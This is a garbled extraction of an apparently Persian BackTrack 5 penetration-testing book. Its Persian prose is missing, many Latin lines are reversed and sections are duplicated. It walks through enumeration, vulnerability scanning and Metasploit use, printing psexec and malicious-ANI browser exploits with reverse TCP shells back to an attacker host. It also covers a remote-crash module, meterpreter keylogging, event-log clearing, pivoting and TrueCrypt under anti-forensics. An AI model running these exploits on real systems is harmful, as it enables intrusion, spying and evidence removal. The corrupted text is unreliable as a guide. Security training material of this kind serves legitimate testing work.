1Author : Alireza AzimzadehNickname : Ali MP5Editor : Ali Tahamtan
First publish : November 2013Yahoo Id: [email protected]
2013 . All Rights Reserved
2
: .
5PM.ilA
-
natmahaT ilA .
.
3
1kcarT kcaB : 1()
2 3 7
7yromeM-hsalF 01(xoB-lautriV) 41xoB-lautriV slooT-MV
51drowssaP - tooR 51
71draobyeK
81kcarT kcaB : 81sredaeH lenreK
91mocdaorB 22drac oediv ITA
52drac oediv AIDIVN 72 72sniahCyxorP
92tpyrCeurT
14)gnirehtaG noitamrofnI( : 14)noitaremune ecivreS(
44 54ksamten PMCI
74
484 15)tnirpregnif SO(
25(tnirpregnif ecivres) 45
55)yfitnedI ytilibarenluV( : 55
65susseN 85susseN[ ]
16SAVnepO 86SAVnepO
96SAVnepO[ ] 27
37)noitatiolpxE( : 37
47)stiolpxE evitcA( 57)tiolpxe evissap(
77elbatiolpsatem 98( )egatimrA
19( ELOSNOCFSM) 49( ILCFSM)ILC
79 reterPreteM 501LQSyM 701lqsergtsoP 901nwpotua_resworb
211
311noitalacsE egelivirP() :
6651enO xidneppA: 651] zg.rat, 2pizb.rat, piz, rat [
651WFU 161( dnammoc)
361 361 ( )
461 661tneilC&revreS_PCHD
761
861owT xidneppA: 861
1
kcartkcaB . :
. " moc.oohay@86ruokraP_ilA
. ".
kcarT|kcaB UNG )xuniL kcartkcaB(
( ) .
. 5 . 62 40.01 utnubU
.
.
. :
. : 11
2gnirehtag noitamrofnI() (1noitacifitnedI ytilibarenluV() (2DIFR ,htooteulB1.2081 (sisylanA krowteN) (3(noitalacsE egelivirP) (4 (scisneroF latigiD) (5)PIOV(PI revO ecioV(6(gnippaM krowteN) (7(sisylanA noitacilppA beW) (8(tiklooT gnireenignE laicoS & tiolpxE) (9(sseccA gniniatniaM) (01(gnireenignE esreveR) (11
evil .
:
/sdaolnwod/gro.xunil-kcartkcab.www//:ptth:
. 46 23 :1.EDKemonG 5TB:2. emonG : 3(.tnerrot-tib .) OSI. :4. EDK EDK emonG :5
3(( )) . noitidE emoH eerf - retsaM noititraP SU esaE (1 noititrapreganam noititrap.www-moc.loot: (2
. detacollanU (3
detacollanu . BG58 . . eteled
.BG81 : 3 :
(. )
4 . ylppa (4.5TB
. 5TBDVD/DC(5.TB-eviL retnE TB (6. xtrats (7kcartkcab llatsni (8
... (9
5... (01
6 detacollanu . (11 " "
.yficeps esare :
. TB
.llatsni (21
7. 1 (
.won tratser (
: drowssap resu (51toor :resUroot :ssapxtrats :tb@toor
(( )) esare 11
. TB ((yromeM-hsalF ))
. BG21 : 1. 23TAF :2
nitooBteNU (1ten.egrofecruos.nitoobtenu.www:
8. (2.egamIksiD (3
. OSI. .... esworB OSI (4. (5
9. KO (6
.woN-toobeR (7
. BSU (8. " " 7 (9
10
USB:1) http://www.ucd.ie/itservices/itsuppo...singtruecrypt/2) https://help.ubuntu.com/community/GPGKeyOnUSBDrive3) http://www.ucl.ac.uk/isd/common/cst/...ngUSBTrueCrypt4) http://www.wikihow.com/Install-Backtrack-Live-to-USB
)) )virtual-box(( (1( :
A. virtual-box.comB. https://www.virtualbox.org/wiki/Downloads
.2( New.
11
.TB MAR (3. maR:1 . ( MV) : 2
21
.BV TB .gnittes (4
.egarots (
31
. osi (6
. KO (7
41
. trats ..........kcartkcaB (8
." " (9:xob-lautriv slooT-MV
. . TB
15
root password: :passwd
:service [name-service] [start/stop]service apache2 startservice pure-ftpd stop
netcat:netcat -tpan | grep 22
: . FTP server:
netcat -tpan | grep 21 :
update-rc.d f defaultsupdate-rc.d f ssh defaults
: :applications > backtrack > services
: :
Applications>>>Internet >>>>Wicd Network Manager
61
yart-on-- ktg-dciw yek seitreporp iF-iW
.ko noitpyrcne
71
: :
draobyek >> secnereferp >> metsys. dda stuoyal
. noitpo tuctrohs . tuoyal egnahc ot )S(yeK noitpo
. tfihs + tla:
: 2 : 2 .
etadpu teg-tpa odus .1citpanys llatsni teg-tpa .2
retnec-erawtfos llatsni teg-tpa
odus citpanys llatsni teg-tparetnec-erawtfos llatsni teg-tpa odus
81
kcartkcaB
. :
.:
mocdaorb revird (1oediv ITA revirddrac(2sredaeh lenrek (3drac AIDIVN revird (4:sredaeh lenrek
: secruos-lenrek-eraperp )1xunil/crs/rsu/ dc )2
/xunil/edulcni */detareneg/edulcni fr- pcsecruos-lenrek-eraperp )3
19
broadcom : :
1) cd /tmp/wget www.broadcom.com/docs/linux_sta/hybri-portsrc_x86_64-v5_100_82_112.tar.gz
20
2( mkdir broadcom
3(extract :tar xvfz hybrid-portsrc_x86_64-v5_100_82_112.tar.gz -C /tmp/broadcom
4( :make cleanmakemake install5) update dependencies :
depmod -a6( :
echo "blacklist " >> /etc/modprobe.d/blacklist.conf7( :
rmmod b438( :
echo "blacklist " >> /etc/modprobe.d/blacklist.conf( boot-process:
modprobe wl
21
:1( :
lspci -vnn | grep Network :
Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller [14e4:4727 ] (rev01)2(PCI-ID :
http://wireless.kernel.org/en/users/Drivers/b433( :e4:472714
:sudo apt-get remove bcmwl-kernel-sourcesudo apt-get install b43-fwcutter
.sudo apt-get install firmware-b43-installer
4(:cat /etc/modprobe.d/* | egrep 'bcm'
. ok. :
blacklist bcm43xx blackllist. :
cd /etc/modprobe.d/sudo gedit blacklist.conf
5( :blacklist bcm43xx
save.
22
broadcom:http://wireless.kernel.org/en/users/Drivers/b43http://askubuntu.com/questions/55868...reless-drivershttps://help.ubuntu.com/community/Wi...Driver/bcm43xxhttp://wiki.debian.org/bcm43xxhttp://www.linuxquestions.org/questi...u-lucid-875477http://ubuntuforums.org/showthread.php?t=915449
ATI video card:1( :
cd /tmp/2( :
http://support.amd.com/us/gpudownload/Pages/index.aspxwget http://www2.ati.com/drivers/linux/amd-driver-installer- 12-1-x86.x86_64.run
3( :sh amd-driver-installer-12-1-x86.x86_64.run
23
4( restart.5( :
apt-get install libroot-python-dev libboost-python-dev libboost1.40-all-dev cmake6( AMD APP SDK :
wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.6- lnx64.tgz
7( :mkdir AMD-APP-SDK-v2.6-lnx64
8( :tar zxvf AMD-APP-SDK-v2.6-lnx64.tgz C /tmp/AMD-APP-SDK-v2.6- lnx64
9( :cd AMD-APP-SDK-v2.6-lnx64
24
10) sh Install-AMD-APP.sh11) echo export ATISTREAMSDKROOT=/opt/AMDAPP/ >> ~/.bashrc
ssource ~/.bashrc12( CAL++ Pyrit:
cd /tmp/
svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp
cd calpp/trunk
cmake
make
make install
cd /tmp/svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_srccd pyrit_src/pyritpython setup.py buildpython setup.py install
13( OpenCL:cd /tmp/pyrit_src/cpyrit_opencl
python setup.py build
python setup.py install14( cpyrit_calpp:
cd /tmp/pyrit_source/cpyrit_calpp
vi setup.py :
VERSION = '0.4.0-dev'
25
VERSION = '0.4.1-dev'
:CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include'))
CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include/CAL'))
15( . .python setup.py build
python setup.py install NVIDIA video card:: 64 . 32 .
1) cd /tmp/2) wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/driv ers/NVIDIA-Linux-
x86_64-285.05.33.run
3( :chmod +x NVIDIA-Linux-x86_64-285.05.33.run4) ./NVIDIA-Linux-x86_64-285.05.33.run kernel-source-path='/usr/src/linux'
26
(cuda toolkit:wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_64_ubuntu11.04.run6) chmod +x cudatoolkit_4.1.28_linux_64_ubuntu11.04.run
( :./cudatoolkit_4.1.28_linux_64_ubuntu11.04.run
8( :echo PATH=$PATH:/opt/cuda/bin >> ~/.bashrcecho LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/opt/cuda/lib >> ~/.bashrcecho export PATH >> ~/.bashrcecho export LD_LIBRARY_PATH >> ~/.bashrc9) source ~/.bashrcldconfig
(apt-get install libssl-dev python-dev python-scapy11)a. svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_src
cd pyrit_src/pyritpython setup.py buildpython setup.py install
b. cd /tmp/pyrit_src/cpyrit_cudapython setup.py buildpython setup.py install
12( :nvcc V
pyrit benchmark
72
: : (1
etadpu teg-tpa: (2
edargpu teg-tpa: (3
edargpu-tsid teg-tpa3diuqs llatsni teg-tpa )4
: evomer 3diuqs f- d.cr-etadpu
:sniahCyxorP :miv (1
fnoc.sniahcyxorp/cte/ miv: ( #)
niahc_cimanyd#:
niahc_cimanyd
82
: (2
29
3( :proxyresolv www.targethost.comproxyresolv www.yahoo.com
TrueCrypt:1( :
Applications | BackTrack | Forensics | Digital Anti Forensics | install truecrypt
2( .3(
30
4(create volume
5(
13
(6
: (7
32
8(
9(
33
(01
: emulov (11
34
12(
13(
14(
35
15(
16(
17(
63
: emulov ym emulov(81
(91
37
20(
21(
38
22(
23(
93
: tnuomsid emulov (42
40
: .
http://pkgs.org/ubuntu-10.04/ubuntu-..._i386.deb.htmlhttp://ubuntuguide.net/install-nvidi...tu-lucid-10-04http://www.ubuntugeek.com/howto-inst...ucid-lynx.htmlhttp://ldt-clan.com/forum/threads/26...butnu-10-4-LTShttp://www.truecrypt.org/http://pkgs.org/ubuntu-10.04/ubuntu-..._i386.deb.htmlhttp://pkgs.org/ubuntu-10.04/ubuntu-..._i386.deb.html
: 32 64 :http://tjwallas.weebly.com/5/post/20...on-ubuntu.html
14
gnirehtaG noitamrofnI:
.: noitaremune ecivreS
noitaremune:.
noitaremune PMNS ,noitaremune SND:noitaremune SND
pi eman retupmoc emanresu . ... sserdda
: /munesnd/snd/noitaremune/tsetnep/ dc
: moc.tegrat mune-- lp.munesnd/.
: h- lp.munesnd/. pleh-- lp.munesnd/.
:
24
: . [rebmun sdaerht]--spukool r-SIOHW d-o-SIOHW w-
:noitaremune PMNS. PMNS . PMNS : (1
/munepmns/pmns/noitaremune/tsetnep/ dc: (2
txt.swodniw cilbup 002.01.861.291 lp.munepmns lrep
43
: SNMP 192.168.10.200 :Installed softwareUsersUptime. Hostname. Discs
:Perl snmpenum.pl [ip address to attack] [community] [config file]
:snmpwalk enumeration : windows host) ( .1( :
snmpwalk -c public 192.168.10.200 -v 2c2( :
snmpwalk -c public 192.168.10.200 -v 1 | grep hrSWInstalledName:
HOST-RESOURCES-MIB::hrSWInstalledName.1 = STRING: "VMware Tools"HOST-RESOURCES-MIB::hrSWInstalledName.2 = STRING: "WebFldrs""
3( TCP:snmpwalk -c public 192.168.10.200 -v 1 | grep tcpConnState cut -d"." -f6 | sort nu|
:212580443...
44
: SNMPcheck enumeration SNMP protocols .
1. :cd /pentest/enumeration/snmp/snmpcheck/
2. :perl snmpcheck.pl -t 192.168.10.200
: fierce enumeration ip address hostname .
1( :cd /pentest/enumeration/dns/fierce/
2( :perl fierce.pl -dns target.com
3( word-list :perl fierce.pl -dns target.com -wordlist hosts.txt -file /tmp/output.txt
:smtp-user enumeration SMPT-server .
:smtp-user-enum.pl -M VRFY -U /tmp/users.txt -t 192.168.10.200
:Determining the network range ip .
54
:yrtimd. niamod-bus pi
: tluser-yrtimd/potkseD/toor/ o- moc.tsohtegrat bpsnw- yrtimd
: . pukool SIOHW bpsnw-
. o-
:ksamten PMCI moc.tsohtegrat s- ksamten
:ypacs ( )
:
46
http://www.arppoisoning.com/demonstrating-an-arp-poisoning-attack-2/http://www.secdev.org/projects/scapy/demo.htmlhttp://packetlife.net/blog/2011/may/23/introduction-scapy
1. :scapy
2. :ans,unans=sr(IP(dst="www.targethost.com/30", ttl=(1,6))/TCP())
3. :ans.make_table( lambda (s,r): (s.dst, s.ttl, r.src) )
216.27.130.165 216.27.130.164 216.27.130.163 216.27.130.162192.168.10.1 192.168.10.1 192.168.10.1 192.168.10.1 151.37.219.254 51.37.219.254 51.37.219.254 51.37.219.254 2223.243.4.254 223.243.4.254 223.243.4.254 223.243.4.254 3223.243.2.6 223.243.2.6 223.243.2.6 223.243.2.6 4
192.251.251.80 192.251.254.1 192.251.251.80 192.251.254.1 5
74
:etuorecart : .1
-kcartkcab.www","moc.elgoog.www"[(etuorecart=snanu,ser)2-=yrter ,02=lttxam,]344,08[=tropd,]"moc.tsohtegrat.www","gro.xunil
. 02 )evil ot emit(LTT 34408 . 02 ltt : : .2
)(hparg.ser
: .3)"gvs.hparg/pmt/ >"=tegrat(hparg.ser
: .4)(tixe
:senihcam evitca gniyfitnedI pI .
:pamn (1261.031.72.612 Ps- pamn
48
:Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-27 23:30 CDTNmap scan report for test-target.net (216.27.130.162)Host is up (0.00058s latency).Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
2( nping: nmap .
nping --echo-client "public" echo.nmap.org
3( hex :nping -tcp -p 445 data AF56A43D 216.27.130.162
Finding open ports: .
:nmap 192.168.56.102
94
: 201.65.861.291 0001-1 p- pamn
05
:22 *.65.861.291 22 p- pamn
: txt.22pct-tsohtegrat-pamn/pmt/ Go- *.01.861.291 22 p- pamn
. (IUG) pamn:1: pamnez
| srennacS krowteN | sisylanA krowteN | gnirehtaG noitamrofnI | kcarTkcaB | snoitacilppApamnez
: pamnez
15
. ISpamn :2:gnitnirpregnif metsys gnitarepO
. trop nepoenihcam evitcasserdda pi .
:(SO tceteD) 201.65.861.291 O- pamn
. :
52
Service fingerprinting: .
1( :nmap -sV 192.168.10.200
:Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-28 05:10 CDTInteresting ports on 192.168.10.200:Not shown: 1665 closed ports
53
PORT STATE SERVICE VERSION21/tcp open ftp Microsoft ftpd 5.025/tcp open smtp Microsoft ESMTP 5.0.2195.671380/tcp open http Microsoft IIS webserver 5.0119/tcp open nntp Microsoft NNTP Service 5.0.2195.6702 (posting ok)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn443/tcp open https?445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds1025/tcp open mstask Microsoft mstask1026/tcp open msrpc Microsoft Windows RPC1027/tcp open msrpc Microsoft Windows RPC1755/tcp open wms?3372/tcp open msdtc?6666/tcp open nsunicast Microsoft Windows Media Unicast Service (nsum.exe)Nmap finished: 1 IP address (1 host up) scanned in 63.311 seconds
2( Amap: .
:amap -bq 192.168.10.200 200-300
:amap v5.4 (www.thc.org/thc-amap) started at 2012-03-28 06:05:30 - MAPPING modeProtocol on 127.0.0.1:212/tcp matches ssh - banner: SSH-2.0- OpenSSH_3.9p1\nProtocol on 127.0.0.1:212/tcp matches ssh-openssh - banner: SSH-2.0-OpenSSH_3.9p1\n
54
amap v5.0 finished at 2005-07-14 23:02:11
:http://www.cyberciti.biz/networking/nmap-command-examples-tutorials/http://nmap.org/book/vscan-examples.htmlhttp://nmap.org/book/install.htmlhttp://www.youtube.com/watch?v=Bfla9NQrJAchttp://www.youtube.com/watch?v=ZTbLyZZbilAhttp://www.youtube.com/watch?v=RAOHmrtaimU
:http://linux.die.net/man/1/nmap
:http://nmap.org/download.html
1 : :Threat assessment with Maltego. :
https://www.paterva.com/web6/community :
Applications |BackTrack |Information Gathering |Web Application Analysis |Open SourceAnalysis |Maltego
2 : .with casefileMapping the network. :
Applications | BackTrack | Reporting Tools | Evidence Management | casefile.
55
noitacifitnedI ytilibarenluV:
. . " "
. .
. . SAVnepOsusseN 2
ytilibarenluV: """"" "
. rennacS ytilibarenluV
ytilibarenluV. . rennacS
evitisoP eslaF . luv ! luVrennacS luV . :
seitilibarenluv xuniL )1seitilibarenluv swodniW )2skcehc ytiruces lacoL )3seitilibarenluv ecivres krowteN )4
56
Installing, configuring, and starting Nessus: nessus:
system-operating-your-http://www.tenable.com/products/nessus/select1. :
apt-get install nessus2. :
/opt/nessus3. :
/etc/init.d/nessusd start4. nessus:
/opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX: nessus X .
.http://plugins.nessus. Org
5. :/opt/nessus/sbin/nessus-adduser
:Applications | BackTrack | Vulnerability Assessment | Vulnerability Scanners | Nessus | nessususer add
75
: .6trats dsussen/d.tini/cte/
58
7. :https://127.0.0.1:8834
:Nessusfinding [network, local, Linux-specific, Windows-specific] vulnerabilities1( Policies.2( add policy.
95
: lareneg( bat) (3. seitilibarenluV lacoL (
: ytilibisiv (. : derahs(a. : etavirp(b
.txen (. snigulp (
.timbus (:snacs (
06
: (
:nacs epyt. : won nur.1. :deludehcS.2. :etalpmeT.3
:tegrat nacs. nacs hcnul pI
16
. :1=ofni =wol=muidem =hgiH: snigulp: :2.
. rennacs luv rennacS IGC: 3. susseN aniteR: 4
:SAVnepO gnitrats dna ,gnirugifnoc ,gnillatsnI:SAVnepo
lmth.daolnwod/gro.savnepo.www//:ptth: (1
/savnepo/csim/tsetnep/ dc: (2
treckm-savnepo. retne (3
: (4cnys-tvn-savnepo
62
5( :openvas-mkcert-client -n om -i
openvasmd --rebuild
6(:openvassd
: .7(:
openvasmd --rebuildopenvasmd --backup
8( :openvasad -c 'add_user' -n openvasadmin -r admin
openvasad -c 'add_user' -n openvasadmin -r Admin
36
: (9resudda-savnepo
: (01. ( .( . ( . D+lrtc ( . Y (
: (111.0.0.721 a- 0939 p- dmsavnepo3939 p- 1.0.0.721 a- dasavnepo2939 p- 1.0.0.721=netsil-- ylno-ptth-- dasg
. 31 21 : : (21
2939:1.0.0.721//:ptth
64
13( openVAS .sh. openvas.sh:
( create document empty file: ( . ( :
#!/bin/bashopenvas-nvt-syncopenvassdopenvasmd --rebuildopenvasmd --backupopenvasmd -p 9390 -a 127.0.0.1openvasad -a 127.0.0.1 -p 9393
56
2939 p- 1.0.0.721=netsil-- ylno-ptth-- dasg. (41:
potkseD/toor dchs.savnepo 777 domhc
: (51hs.savnepo/.
. SAVnepo :
: (1
(2
66
3(
4(
67
5(
6(
68
Using the OpenVAS Desktop:1) Applications | BackTrack | Vulnerability Assessment | Vulnerability Scanners | OpenVAS |
Start GreenBone Security Desktop
2( username , passwordloopback:127.0.0.1 =loopback
96
seitilibarenluv ]xuniL ,swodniW ,krowten ,lacol[ gnidnif SAVnepO:: .1
2939:1.0.0.721//:ptth
.noitarugifnoc gifnoc nacS .2
. .3:esab .4
. : ..,citats ,ytpme( . :tsaf dna lluF(
.gifnoc nacs etaerc .5
. lacol . lacol f+lrtc .6
07
. s'TVN lla tceleS .7
.gifnoc evas .8: stegrat noitarugifnoc .9
. .01: .11
02.1.861.291 )a04.1.861.291,02.1.861.291 )b09-01.1.861.291 )c
17
.tegrat etaerc .21 ksat wen . tnemeganam nacs: noitarugifnoc .31
: .ksat ( . ( . ( . ( .ksat etaerc (
.ksats tnemeganam nacs .41. ( yalp) .51
72
:1. Scan management tasks.2. .3. " " .
:http://www.openvas.org/setup-and-start.htmlhttp://www.openvas.org/install-packages-v5.html#ubuntuhttp://packages.ubuntu.com/search?ke...ll§ion=allhttp://www.back-door.webs.com/Backtr...0Tutorial.htmlhttp://www.openvas.orghttp://www.backtrack-linux.org/wiki/index.php/OpenVashttp://www.irongeek.com/i.php?page=videos/nessushttp://www.tenable.com/blog/enabling-nessus-on-backtrack-5-the-official-guidehttps://wiki.archlinux.org/index.php/nessushttp://www.admin-magazine.com/Articles/Pen-Test-Tipshttp://www.securityfocus.com/tools/category/11
37
noitatiolpxE:
( ) . tiolpsatem .
. ...(. ) :ytilibarenluv
: ) :tiolpxe...( . : ) :daolyap
.( daolyap . :daolyaP:
,noitcejni LLD ,noitucexe dnammoc ,llehs evitcaretni na ,noitucexe elif ,noitcejni CNV edulcnireterpreteM eht , resu a gnidda
:daolyap : 3
:elgnis exe.lac .
.:sregatS
. ( )
74
Stages: ) ( stagers .
:meterpreter, vnc injection..... payload :
. :InlineStagedMeterpreterPassiveXNoNXOrdIPv6Reflective DLL injection
Active Exploits : . :
. ... . :
msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set RHOST 192.168.1.100RHOST => 192.168.1.100msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcpPAYLOAD => windows/shell/reverse_tcpmsf exploit(psexec) > set LHOST 192.168.1.5LHOST => 192.168.1.5msf exploit(psexec) > set LPORT 4444LPORT => 4444msf exploit(psexec) > set SMBUSER victimSMBUSER => victimmsf exploit(psexec) > set SMBPASS s3cr3tSMBPASS => s3cr3tmsf exploit(psexec) > exploit[*] Connecting to the server...[*] Started reverse handler[*] Authenticating as user 'victim'...[*] Uploading payload...
75
[*] Created \hikmEeEM.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl]...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...[*] Obtaining a service manager handle...[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...[*] Closing service handle...[*] Opening service..............[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)
Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system3>
passive exploit: .FTP, Web Browser....
:ssessions i . "
" . web app side attack.
PAYLOAD => windows/shell/reverse_tcpmsf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.101LHOST => 192.168.1.101msf exploit(ani_loadimage_chunksize) > set LPORT 4444LPORT => 4444msf exploit(ani_loadimage_chunksize) > exploit[*] Exploit running as background job.
46[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/[*] Local IP: http://192.168.1.101:8080/[*] Server started.
msf exploit(ani_loadimage_chunksize) >[*] Attempting to exploit ani_loadimage_chunksize
76
[*] Sending HTML page to 192.168.1.104:1077...[*] Attempting to exploit ani_loadimage_chunksize[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to
192.168.1.104:1077...[*] Sending stage (240 bytes)[*] Command shell session 2 opened (192.168.1.101:4444 -> 192.168.1.104:1078)
msf exploit(ani_loadimage_chunksize) > sessions -i 2[*] Starting interaction with 2......................
exploitation:Applications | BackTrack | Exploitation Tools
Network Exploitation Tools :Cisco AttacksFast-TrackMetasploit FrameworkSAP ExploitationWeb Exploitation Tools :oscannerfimapasp-auditoysslstripwebsploit
77
Database Exploitation Tools :MSSQL Exploitation ToolsMySQL Exploitation ToolsOracle Exploitation ToolsWireless Exploitation Tools :BlueTooth ExploitationGSM ExploitationWLAN ExploitationSocial Engineering Tools :BeEF XSS FrameworkHoneyPotsSocial Engineering ToolkitPhysical Exploitation :ArduinoKautilyau3-pwnvideoJAKOpen Source Exploitation :Exploit-DBOnline Archives
Installing and configuring Metasploitable: )) :((
: ( . (8-10 GB virtual-pc).( ( 7zipwinrar WinZip.
:http://sourceforge.net/projects/metasploitable/files/
1( :
87
.wen (2.txen (3
: (4
97
: MAR (5.BM215
: (6
08
: (7
.etaerc (
:trats (9
18
((:3R-5TB )) . 001%
buhtig etadpufsm: tb : etavirp . .
. : . . 2
82
1( :apt-get update
83
2( :sudo apt-get install git-core -ysudo apt-get install curl -yapt-get install libpq-desudo apt-get install build-essential openssl libreadline6 libreadline6-dev curl git-core zlib1gzlib1g-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt-dev autoconf libc6-devlibgdbm-dev ncurses-dev automake libtool bison subversion pkg-config libffi-devsudo apt-get -y install \build-essential zlib1g zlib1g-dev \libxml2 libxml2-dev libxslt-dev locate \libreadline6-dev libcurl4-openssl-dev git-core \libssl-dev libyaml-dev openssl autoconf libtool \ncurses-dev bison curl wget postgresql \postgresql-contrib libpq-dev \libapr1 libaprutil1 libsvn1 \libpcap-dev
3( . : .
( 200MB :rm -rf $HOME/metasploitgit clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit
5( :git clone git://github.com/sstephenson/rbenv.git ~/.rbenv
84
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.profileecho 'eval "$(rbenv init -)"' >> ~/.profile
84
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.profileecho 'eval "$(rbenv init -)"' >> ~/.profile
84
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.profileecho 'eval "$(rbenv init -)"' >> ~/.profile
58
: (6/vnebr./~ dcsnigulp ridkmsnigulp/vnebr./~ dctig.dliub-ybur/nosnehpetss/moc.buhtig//:tig enolc tig
. erawMV. :.
. ybur .ybur3.1 (701: 02 : 3.9.1
: 583p-3.9.1 llatsni vnebr
: : gro.smegybur.www583p-3.9.1 labolg vnebrhsaher vnebrv ybur
68
: (8reldnub llatsni megv- sliarsliar llatsni megv- sliar
. 3fsm tiolpsatem toor (9: (01
tiolpsatem/tpo/ dc. ecalper 3fsm (11: 01 (21
:)3fsm/tiolpsatem/tpo/ dc(llatsni eldnub && eldnub llatsni meg
: (31llatsni eldnub && eldnub llatsni meg
meg . meg21 11 .
gro.smegybur.www: meg
meg-eman llatsni meg:
1_lrig_itokin llatsni meg: (41
3fsm/tiolpsatem/tpo/ dc:(51
llatsni eldnub: (61
87
gem update
17( :Msfupdate
87
gem update
17( :Msfupdate
87
gem update
17( :Msfupdate
88
18( metasploit :./msfconsole
./msfconsole -L
88
18( metasploit :./msfconsole
./msfconsole -L
88
18( metasploit :./msfconsole
./msfconsole -L
98
tiolpsateM rof loot tnemeganam lacihparg eht egatimrA gniretsaM: egatimra atem
. ( )enil dnammoc egatimra atem
. atem . liaf :egatimra
:
98
tiolpsateM rof loot tnemeganam lacihparg eht egatimrA gniretsaM: egatimra atem
. ( )enil dnammoc egatimra atem
. atem . liaf :egatimra
:
98
tiolpsateM rof loot tnemeganam lacihparg eht egatimrA gniretsaM: egatimra atem
. ( )enil dnammoc egatimra atem
. atem . liaf :egatimra
:
90
Applications | BackTrack | Exploitation Tools | Network Exploitation Tools | MetasploitFramework | armitage
:armitage
connect.
:http://www.fastandeasyhacking.com/starthttp://www.fastandeasyhacking.com
yes.
19
:
. A:. B:tiolpsatem noisses-elosnoc reterpretm. C:
:)ELOSNOCFSM( elosnoC tiolpsateM eht gniretsaMelosnoc egatimra
. :
( . ( .tiolpsatem ( .....
29
: . .1
elosnocfsm: :
3fsm/tiolpsatem/tpo/ dc. elosnocfsm
: >fsm
:tiolpsatem .2. : pleh. . : esu. noitpO tes:
. tiolpxe :eludom tiolpxe-non. : nur
. : hcraes(. ) : tixe
: : xunil hcraes >fsm
39
: xunil_rtj/eszylana/yrailixua esu
. rekcarc drowssap xuniL
: snoitpo wohs
.
49
: nhoj/sdrowssap/tsetnep/ HTAP_NHOJ tes
. :
tiolpxe
. daolyap : 1 . daolyap tes : 2
:)ILCFSM( ILC tiolpsateM eht gniretsaM ILCFSM ( ecafretni)
. . /
. :1. elosnocfsm :2
:ILCFSM :
ilcfsm.ILCFSM
59
: h ilcfsm
:A A samx/nacstrop/rennacs/yrailixua ilcfsm/3fsm/tiolpsatem/tpo/
. A
69
:S S samx/nacstrop/rennacs/yrailixua ilcfsm/3fsm/tiolpsatem/tpo/
. . . S
:O O samx/nacstrop/rennacs/yrailixua ilcfsm/3fsm/tiolpsatem/tpo/
. tiolpxe snoitpo O
79
:E E samx/nacstrop/rennacs/yrailixua ilcfsm/3fsm/tiolpsatem/tpo/
. E
:reterpreteM gniretsaM .
. :
. pleh:. fsm noisses : dnuorgkcab :daolnwod
. llehs:. noisses : i- noisses
. trats_nacsyek:. pmud_nacsyek:. pots_nacsyek:
. :led sp:
. gol : varaelc3556 3536 llik :
98
1.:back .
:msf auxiliary(ms09_001_write) > backmsf >
2.check: exploit .
msf exploit(ms04_045_wins) > show optionsName Current Setting Required Description-------------RHOST 192.168.1.114 yes The target addressRPORT 42 yes The target portExploit target:Id Name------------0 Windows 2000 Englishmsf exploit(ms04_045_wins) > check[-] Check failed: The connection was refused by the remote host (192.168.1.114:42)
. ) ( .3.connect:
netcattelnet .msf > connect 192.168.1.1 23[*] Connected to 192.168.1.1:23!DD-WRT v24 std (c) 2008 NewMedia-NET GmbHRelease: 07/27/08 (SVN revision: 10011)
-s :msf > connect -s www.metasploit.com:443[*] Connected to www.metasploit.com:443GET / HTTP/1.0HTTP/1.1 302 FoundDate: Sat, 25 Jul 2009 05:03:42 GMT
99
Server: Apache/2.2.11Location: http://www.metasploit.org/
4.exploitrun: exploit auxiliary module, run.
msf auxiliary(ms09_001_write) > runAttempting to crash the remote host...datalenlow=65535 dataoffset=65535 fillersize=72rescuedatalenlow=55535 dataoffset=65535 fillersize=72rescuedatalenlow=45535 dataoffset=65535 fillersize=72rescuedatalenlow=35535 dataoffset=65535 fillersize=72rescuedatalenlow=25535 dataoffset=65535 fillersize=72rescue35...snip...
5.irb: .
framework .msf > irb[*] Starting IRB shell...
>> puts "Hello, metasploit!"Hello, metasploit!
>> Framework::Version=> "3.3-dev"
>> framework.modules.keys.length=>744
6.: jobs msf :
100
7.:-K : job ).(-k : job ). job.(-i : job .
load: ..
msf > loadUsage: load [var=val var =val ...]var=val
val :msf > load pcap_log[*] Successfully loaded plugin: pcap_log
8.unload: .
msf > load pcap_log[*] Successfully loaded plugin: pcap_log
msf > unload pcap_logUnloading plugin pcap_log...unloaded.
9.route:meterpreter route -h :
add [subnet] [netmask] [gateway]delete [subnet] [netmask] [gateway]list
pivoting . .
msf exploit(ms08_067_netapi) > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]Route traffic destined to a given subnet through a supplied session.The default comm is Local.
101
:msf exploit(ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 2msf exploit(ms08_067_netapi) > route printActive Routing Table====================Subnet Netmask Gateway------ ------- ------- -------192.168.1.0 255.255.255.0 Session 2
10.info::
